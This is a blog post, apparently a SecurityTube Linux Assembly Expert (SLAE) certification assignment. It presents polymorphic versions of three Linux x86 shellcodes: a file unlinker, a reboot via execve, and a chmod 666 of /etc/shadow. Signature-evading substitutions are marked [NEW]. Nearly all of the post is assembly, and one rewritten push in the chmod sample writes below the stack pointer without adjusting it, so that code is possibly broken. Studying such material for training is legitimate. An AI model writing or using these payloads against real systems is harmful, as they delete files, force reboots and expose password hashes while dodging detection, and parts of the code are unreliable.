martes, 13 de mayo de 2014

[SLAE] VI - Polymorphic

Source: SecurityTube

I recommend check this article Polymorphic Shellcode Engine Using Spectrum Analysis


;26 bytes
;Shellcode : linux/x86 File unlinker 18 bytes + file path length
global _start
section .text
_start:

    jmp one

two
    pop ebx
    ;mov al, 0xa ;[ORIGIN]
    mov al, 0x7  ;[NEW]
    add al,  0x5 ;[NEW]
    sub al,  0x2 ;[NEW]
    int 0x80

    mov al, 01
    xor ebx, ebx
    int 0x80

one:
    call two
    file: db 0xaa, 0xbb, 0xcc, 0xdd; <- your file here
Original here

;46 bytes
;Shellcode Linux x86 PUSH reboot()
global _start
section .text
_start:

    xor eax, eax
    push eax
    
    ;push 0x746f6f62; toob [ORIGINAL]
    mov esi, 0x746f6c59   ; [NEW]
    add si,  0x309        ; [NEW]
    mov dword [esp-4], esi; [NEW]
    sub esp, 4            ; [NEW]
    push 0x65722f6e  ; er/n [ORIGINAL]
    
    push 0x6962732f; ibs/[ORIGINAL]

    mov ebx, esp
    push eax; 0

    mov edx, esp
    push ebx

    mov ecx, esp
    mov al, 0xb; [ORIGINAL]
    mov al, 0x6; [NEW]
    add al, 0x5; [NEW] 11 = NR_execve

    int 0x80     
Original here

;Linux/x86 - chmod() 666 /etc/shadow & exit()

;39 bytes shellcode
global _start
section .text
_start:

    push ecx
    mov cx, 0x1b6; = 438
    ;push 0x776f6461; woda [ORIGINAL]
    mov esi, 0x776f6158;   [NEW]
    add si, 0x309 ;  woda  [NEW]
    mov dword [esp-4], esi;[NEW]
    push 0x68732f63; hs/c
    push 0x74652f2f; te//
    mov ebx, esp ;save pointer
    push 0xf     ;chmod
    pop eax      ;15
    int 0x80
    inc eax ;exit
    int 0x80
Original here

SLAE-513

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:


No hay comentarios:

Publicar un comentario